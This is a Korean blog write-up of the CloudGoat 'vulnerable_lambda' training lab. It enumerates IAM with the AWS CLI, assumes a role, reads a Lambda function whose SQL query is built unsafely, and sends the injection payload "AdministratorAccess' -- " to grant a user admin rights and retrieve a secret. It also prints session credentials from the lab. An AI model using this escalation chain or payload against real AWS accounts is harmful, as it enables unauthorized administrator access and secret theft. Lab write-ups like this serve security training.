반응형
문제 URL 경로
cloudgoat/cloudgoat/scenarios/aws/vulnerable_lambda/README.md at master · RhinoSecurityLabs/cloudgoat
CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool - RhinoSecurityLabs/cloudgoat
github.com
문제 설명
1) you start as the 'bilbo' user
2) You will assume a role with more privileges
3) discover a lambda function that applies policies to users
4) and exploit a vulnerability in the function to escalate the privileges of the bilbo user in order to search for secrets.
문제 풀이
0. 환경 구성
#---------- 0. 환경설정 ----------
cloudgoat create vulnerable_lambda --profile cloudgoat
cat start.txt
cloudgoat_output_aws_account_id = 739275444311
cloudgoat_output_bilbo_access_key_id = <bilbo_access_key_id>
cloudgoat_output_bilbo_secret_key = <bilbo_secret_key>
profile = cloudgoat
scenario_cg_id = cgid2bx1fsjdcs
### 프로파일 생성 ###
aws configure --profile vulnerable_lambda
1. 현재 소유 권한 분석
현재 가지고 있는 소유 권한을 분석해보면 아래와 같습니다.
이를 통해 sts:AssumeRole을 이용하여 역할 전환 할 수 있음을 파악할 수 있습니다.
# ---------- 1. 현재 소유 권한 분석 ----------
### 계정 리스트 확인 ###
aws iam list-users --profile vulnerable_lambda | grep cgid2bx1fsjdcs
{
"Path": "/",
"UserName": "cg-bilbo-cgid2bx1fsjdcs",
"UserId": "AIDA2YICACBL6J4VJJ5WY",
"Arn": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs",
"CreateDate": "2025-04-11T00:41:57Z"
}
### 그룹 확인 ###
aws iam list-groups --profile vulnerable_lambda | grep cgid2bx1fsjdcs
### 정책 리스트 확인 ###
aws iam list-policies --profile vulnerable_lambda | grep cgid2bx1fsjdcs
aws iam list-policies --profile vulnerable_lambda | grep bilbo
aws iam list-policies --profile vulnerable_lambda | grep lambda
### <user> 에게 적용된 AWS 관리 정책 ###
aws iam list-attached-user-policies \
--user-name cg-bilbo-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"AttachedPolicies": []
}
### <user> 에게 적용된 Inline 정책 ###
aws iam list-user-policies \
--user-name cg-bilbo-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"PolicyNames": [
"cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer"
]
}
### <user> 에게 적용된 Inline 정책 (확인) ###
aws iam get-user-policy \
--policy-name cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer \
--user-name cg-bilbo-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"UserName": "cg-bilbo-cgid2bx1fsjdcs",
"PolicyName": "cg-bilbo-cgid2bx1fsjdcs-standard-user-assumer",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Resource": "arn:aws:iam::940877411605:role/cg-lambda-invoker*",
"Sid": ""
},
{
"Action": [
"iam:Get*",
"iam:List*",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy"
],
"Effect": "Allow",
"Resource": "*",
"Sid": ""
}
]
}
}
### 역할 리스트 ###
aws iam list-roles \
--profile vulnerable_lambda | grep cgid2bx1fsjdcs
# 출력결과
"RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
"Arn": "arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs",
"RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"Arn": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
### 역할1 확인 ###
aws iam get-role \
--role-name cg-lambda-invoker-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"Role": {
"Path": "/",
"RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
"RoleId": "AROA2YICACBLWL3YA3LZU",
"Arn": "arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs",
"CreateDate": "2025-04-11T00:42:13Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600,
"Tags": [
{
"Key": "Name",
"Value": "cg-cgid2bx1fsjdcs"
},
{
"Key": "Scenario",
"Value": "vulnerable-lambda"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"RoleLastUsed": {}
}
}
### 역할1에 붙은 Managed 정책 확인 ###
aws iam list-attached-role-policies \
--role-name cg-lambda-invoker-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"AttachedPolicies": []
}
### 역할1에 붙은 inline 정책 (cg-lambda-invoker-cgid2bx1fsjdcs) ###
aws iam list-role-policies \
--role-name cg-lambda-invoker-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"PolicyNames": [
"lambda-invoker"
]
}
### 역할1 정책 확인 - lambda-invoker ###
aws iam get-role-policy \
--role-name cg-lambda-invoker-cgid2bx1fsjdcs \
--policy-name lambda-invoker \
--profile vulnerable_lambda
{
"RoleName": "cg-lambda-invoker-cgid2bx1fsjdcs",
"PolicyName": "lambda-invoker",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"lambda:ListFunctionEventInvokeConfigs",
"lambda:InvokeFunction",
"lambda:ListTags",
"lambda:GetFunction",
"lambda:GetPolicy"
],
"Effect": "Allow",
"Resource": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1"
},
{
"Action": [
"lambda:ListFunctions",
"iam:Get*",
"iam:List*",
"iam:SimulateCustomPolicy",
"iam:SimulatePrincipalPolicy"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
}
### 역할2 확인 ###
aws iam get-role \
--role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--profile vulnerable_lambda
{
"Role": {
"Path": "/",
"RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"RoleId": "AROA2YICACBLYTYJDP54S",
"Arn": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
"CreateDate": "2025-04-11T00:41:58Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "lambda.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600,
"Tags": [
{
"Key": "Name",
"Value": "cg-cgid2bx1fsjdcs"
},
{
"Key": "Scenario",
"Value": "vulnerable-lambda"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"RoleLastUsed": {}
}
}
### 역할2에 붙은 Managed 정책 확인 ###
aws iam list-attached-role-policies \
--role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--profile vulnerable_lambda
{
"AttachedPolicies": []
}
### 역할2에 붙은 inline 정책 (cgid2bx1fsjdcs-policy_applier_lambda1) ###
aws iam list-role-policies \
--role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--profile vulnerable_lambda
{
"PolicyNames": [
"policy_applier_lambda1"
]
}
### 역할2 정책 확인 - policy_applier_lambda1 ###
aws iam get-role-policy \
--role-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--policy-name policy_applier_lambda1 \
--profile vulnerable_lambda
{
"RoleName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"PolicyName": "policy_applier_lambda1",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "iam:AttachUserPolicy",
"Effect": "Allow",
"Resource": "arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs"
},
{
"Action": [
"logs:CreateLogStream",
"logs:PutLogEvents"
],
"Effect": "Allow",
"Resource": "arn:aws:logs:us-east-1:739275444311:log-group:/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1:*"
}
]
}
}
### 940877411605 계정 lambda-invoker 역할 전환 ###
aws sts assume-role \
--role-arn arn:aws:iam::940877411605:role/cg-lambda-invoker-cgid2bx1fsjdcs \
--role-session-name Test1 \
--profile vulnerable_lambda
# 출력결과
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::739275444311:user/cg-bilbo-cgid2bx1fsjdcs is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::940877411605:role/cg-lambda-invoker-cgid2bx1fsjdcs
### 739275444311 계정 lambda-invoker 역할 전환 ###
aws sts assume-role \
--role-arn arn:aws:iam::739275444311:role/cg-lambda-invoker-cgid2bx1fsjdcs \
--role-session-name Test2 \
--profile vulnerable_lambda
{
"Credentials": {
"AccessKeyId": "ASIA2YICACBL7GNYOXPD",
"SecretAccessKey": "qZBOeg8tWlH30LHDm5UqNMLhEfvmzSaB8uQt+ZLm",
"SessionToken": "IQoJb3JpZ2luX2VjEIb//////////wEaCXVzLWVhc3QtMSJGMEQCIHPto/rksY1wZFBikuujeYQpokzt7u9s7KCxyb/2byO4AiAtQoKRL/wCRVOOhNlBl7XPOHeGfBTI3sRfycYm0Cl92yqbAgj///////////8BEAAaDDczOTI3NTQ0NDMxMSIMskKlt7o5PVlnu0IiKu8BtwohQouZd/vQlBhf/Z+nUby15JnYgxXKWmhVL1QicDRJpkLtgkntAqmmLQuTyLRb/FHXp3BcwMRnuSmxCqxFVvmG6PI6QARwFLOvbGGxfGM8gFbzM5AiIQof4FmE6tpt5NUUHtJNK0sa1n4ow1iNoJiFtCYCLkAByWtk2ufBT251mepdTVDb6Xn5HqNn/M7EWKXxYSYfxL7Oi1TJgz+G9qDzOhg/lXWiwsiYMzaw8EWESURtWbnrTA1JjoGDbTVK7B35hjOnj1JgLrjEUkZ5HE40Ol2RH4HHyuhRYdD+RVHVWDG+R8RYyEUF1acc/yUwsLfyvwY6ngHLd96AOBzGFbMFAu020BVMSlJnhq8f4Dg/RQWj4HF3nfuCr+F6nZkwdeu0qvmPj8zC+74Gb+jVomxGo/WusMR4JOIQZLSNGBcxsTLLhEwgV3GZWUeUpfaLubPH8K2GjFr97nbw8Z0r5nkuzuz0VWDk/Og2bh+jQI2JxdSQ0Hbb3Jj0h5ERtaa4nY5cF4Cl4D9pE7QfsZgq5qdW2JyUTg==",
"Expiration": "2025-04-14T06:22:56+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROA2YICACBL6YEKWBZRX:Test2",
"Arn": "arn:aws:sts::739275444311:assumed-role/cg-lambda-invoker-cgid2bx1fsjdcs/Test2"
}
}
2. 역할 전환 후 Lambda 접근
역할 전환 이후 얻은 권한으로 Lambda에 접근합니다.
### 역할 전환에 따른 새로운 프로파일 생성 ###
aws configure set --profile <profile_name> aws_access_key_id <aws_access_key_id>
aws configure set --profile <profile_name> aws_secret_access_key <aws_secret_access_key>
aws configure set --profile <profile_name> aws_session_token <aws_session_token>
### lambda 함수 확인 ###
aws lambda list-functions \
--profile lambda-invoker
{
"Functions": [
{
"FunctionName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"FunctionArn": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1",
"Runtime": "python3.9",
"Role": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
"Handler": "main.handler",
"CodeSize": 1515773,
"Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2025-04-12T01:50:08.735+0000",
"CodeSha256": "WrQlXmLzMDqjmFLHc5bkjmjlARW/PgzS7RGeW85WbDI=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "eb170973-7b56-48e3-b98b-1025686048aa",
"PackageType": "Zip",
"Architectures": [
"x86_64"
],
"EphemeralStorage": {
"Size": 512
},
"SnapStart": {
"ApplyOn": "None",
"OptimizationStatus": "Off"
},
"LoggingConfig": {
"LogFormat": "Text",
"LogGroup": "/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1"
}
}
]
}
### 함수 사용법을 위해 Lambda 코드 확인###
aws lambda get-function \
--function-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--profile lambda-invoker
{
"Configuration": {
"FunctionName": "cgid2bx1fsjdcs-policy_applier_lambda1",
"FunctionArn": "arn:aws:lambda:us-east-1:739275444311:function:cgid2bx1fsjdcs-policy_applier_lambda1",
"Runtime": "python3.9",
"Role": "arn:aws:iam::739275444311:role/cgid2bx1fsjdcs-policy_applier_lambda1",
"Handler": "main.handler",
"CodeSize": 1515773,
"Description": "This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2025-04-12T01:50:08.735+0000",
"CodeSha256": "WrQlXmLzMDqjmFLHc5bkjmjlARW/PgzS7RGeW85WbDI=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "eb170973-7b56-48e3-b98b-1025686048aa",
"State": "Active",
"LastUpdateStatus": "Successful",
"PackageType": "Zip",
"Architectures": [
"x86_64"
],
"EphemeralStorage": {
"Size": 512
},
"SnapStart": {
"ApplyOn": "None",
"OptimizationStatus": "Off"
},
"RuntimeVersionConfig": {
"RuntimeVersionArn": "arn:aws:lambda:us-east-1::runtime:d6dc717114b06da7d4b5a2df328222709ec4fad2853004fac301b8b63a65c084"
},
"LoggingConfig": {
"LogFormat": "Text",
"LogGroup": "/aws/lambda/cgid2bx1fsjdcs-policy_applier_lambda1"
}
},
"Code": {
"RepositoryType": "S3",
"Location": "https://prod-04-2014-tasks.s3.us-east-1.amazonaws.com/snapshots/739275444311/cgid2bx1fsjdcs-policy_applier_lambda1-80679360-e210-4a9c-a160-1b22dfdaf277?versionId=GhMhCfHgv3dlzPmVNK_Fi.JklcCM7.d8&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJIMEYCIQD9JwRHHBfqLsF7WOfGbpiLhTLzHsPtMIIA%2F8fGPL048QIhAPR%2Ft1GJNJNrq8GAKVzZQwjg7ECS043ECOABGPjiT0PHKpICCPX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMNzQ5Njc4OTAyODM5IgxckJ1oMMvZW2Tp81Aq5gF2i5rKd4OuzuVcrcAm4IThkIh0EHpwGQiRvn1J7OpQyyUTZgxmo%2BgA0dTQcJA%2BaJAzVmuxiJwaTcwoHekXT%2FPVf9nDJ%2BE7aSQUovIXVoOWWAu3HI0yGtWH6sERb7rWbquGH63ltf%2Fi%2BJ3C6Krfe%2FOEzDwRqBhuwjIIIyJsW7cVza8KXAccj6H10PBvFZhQdTnqN0tgG0xkl3DDtmkm1%2FgapLgNsAxApvdUY0faR4R0%2BXZKi%2BQ0meZ2ky5Kn7SVN9iaOuxyiBDY3Np88ZwjC0Ni7u2CpZHuS6uiLi0E0VyMVJxJJ1rY2DDks%2FC%2FBjqOAfDa5qe%2FENuInbaTDGtTffXKK4nkem1GH9233Hrd%2FijG6xXDpmTrPBcz46qPn%2FJrZ9DBFZppFpRnI8%2BjY9zyDb2EQwaqXm4sZRvfSz4yw6hS8%2F99yFXkDC8PkcuKIN6HnlomHlnJDY7THjzhnxLF5AR3WnsgEfLDnSADTIkpAwqYwJZm88rtY52L0NjYEjM%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250414T052331Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIA25DCYHY32XA3KBKX%2F20250414%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=32989a15d4ffe57a59b46404cc27ffa545ce02ff7bc6327a8f8f0685ec7ca47f"
},
"Tags": {
"Name": "cg-cgid2bx1fsjdcs",
"Scenario": "vulnerable-lambda",
"Stack": "CloudGoat"
}
}
3. Lambda 코드 분석
main.py 소스코드를 분석하여 이 소스의 취약점을 공략합니다.
# main.py
import boto3
from sqlite_utils import Database
db = Database("my_database.db")
iam_client = boto3.client('iam')
# db["policies"].insert_all([
# {"policy_name": "AmazonSNSReadOnlyAccess", "public": 'True'},
# {"policy_name": "AmazonRDSReadOnlyAccess", "public": 'True'},
# {"policy_name": "AWSLambda_ReadOnlyAccess", "public": 'True'},
# {"policy_name": "AmazonS3ReadOnlyAccess", "public": 'True'},
# {"policy_name": "AmazonGlacierReadOnlyAccess", "public": 'True'},
# {"policy_name": "AmazonRoute53DomainsReadOnlyAccess", "public": 'True'},
# {"policy_name": "AdministratorAccess", "public": 'False'}
# ])
def handler(event, context):
target_policys = event['policy_names']
user_name = event['user_name']
print(f"target policys are : {target_policys}")
for policy in target_policys:
statement_returns_valid_policy = False
statement = f"select policy_name from policies where policy_name='{policy}' and public='True'"
for row in db.query(statement):
statement_returns_valid_policy = True
print(f"applying {row['policy_name']} to {user_name}")
response = iam_client.attach_user_policy(
UserName=user_name,
PolicyArn=f"arn:aws:iam::aws:policy/{row['policy_name']}"
)
print("result: " + str(response['ResponseMetadata']['HTTPStatusCode']))
if not statement_returns_valid_policy:
invalid_policy_statement = f"{policy} is not an approved policy, please only choose from approved " \
f"policies and don't cheat. :) "
print(invalid_policy_statement)
return invalid_policy_statement
return "All managed policies were applied as expected."
if __name__ == "__main__":
payload = {
"policy_names": [
"AmazonSNSReadOnlyAccess",
"AWSLambda_ReadOnlyAccess"
],
"user_name": "cg-bilbo-user"
}
print(handler(payload, 'uselessinfo'))
4. Exploit 이후 Secret 확인
payload.json에 AdministratorAccess 뒤를 주석 처리하여 검증을 무력화 하고
이후 Lambda 함수를 실행합니다.
### Bilbo 사용자에게 권한 추가 ###
# payload.json
{"policy_names": ["AdministratorAccess' -- "], "user_name": "cg-bilbo-cgid2bx1fsjdcs"}
### Lambda 함수 실행 ###
aws lambda invoke \
--function-name cgid2bx1fsjdcs-policy_applier_lambda1 \
--cli-binary-format raw-in-base64-out \
--payload file://payload.json \
response.json \
--profile lambda-invoker
### <user> 에게 적용된 AWS 관리 정책 ###
aws iam list-attached-user-policies \
--user-name cg-bilbo-cgid2bx1fsjdcs \
--profile vulnerable_lambda
{
"AttachedPolicies": [
{
"PolicyName": "AmazonSNSReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonSNSReadOnlyAccess"
},
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
},
{
"PolicyName": "AmazonGlacierReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonGlacierReadOnlyAccess"
},
{
"PolicyName": "AmazonRDSReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonRDSReadOnlyAccess"
},
{
"PolicyName": "AmazonS3ReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
},
{
"PolicyName": "AmazonRoute53DomainsReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonRoute53DomainsReadOnlyAccess"
},
{
"PolicyName": "AWSLambda_ReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AWSLambda_ReadOnlyAccess"
}
]
}
### Secret 리스트 조회 ###
aws secretsmanager list-secrets \
--profile vulnerable_lambda
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid2bx1fsjdcs-final_flag-paxlge",
"Name": "cgid2bx1fsjdcs-final_flag",
"LastChangedDate": "2025-04-12T10:50:01.736000+09:00",
"LastAccessedDate": "2025-04-12T09:00:00+09:00",
"Tags": [
{
"Key": "Name",
"Value": "cg-cgid2bx1fsjdcs"
},
{
"Key": "Scenario",
"Value": "vulnerable-lambda"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SecretVersionsToStages": {
"terraform-20250412015001367600000002": [
"AWSCURRENT"
]
},
"CreatedDate": "2025-04-12T10:49:59.853000+09:00"
}
]
}
### Secret 확인 ###
aws secretsmanager get-secret-value \
--secret-id cgid2bx1fsjdcs-final_flag \
--profile vulnerable_lambda
{
"ARN": "arn:aws:secretsmanager:us-east-1:739275444311:secret:cgid2bx1fsjdcs-final_flag-paxlge",
"Name": "cgid2bx1fsjdcs-final_flag",
"VersionId": "terraform-20250412015001367600000002",
"SecretString": "cg-secret-846237-284529",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-04-12T10:50:01.732000+09:00"
}
보안 개선 방안
1. Lambda 함수에 권한 최소화
내용이 유용하셨다면 좋아요&댓글 부탁드립니다.
이 블로그를 이끌어갈 수 있는 강력한 힘입니다!
caul334@gmail.com
반응형
'IT > Cloud' 카테고리의 다른 글
| [CloudGoat] beanstalk_secrets 문제풀이 Write-up (0) | 2025.04.15 |
|---|---|
| AWS 역할전환 sts AssumeRole 성립 조건 및 예외사항 (0) | 2025.04.14 |
| [CloudGoat] cloud_breach_s3 문제풀이 Write-up (0) | 2025.04.10 |
| [CloudGoat] sqs_flag_shop 문제풀이 Write-up (1) | 2025.04.09 |
| [CloudGoat] iam_privesc_by_rollback 문제풀이 Write-up (0) | 2025.04.08 |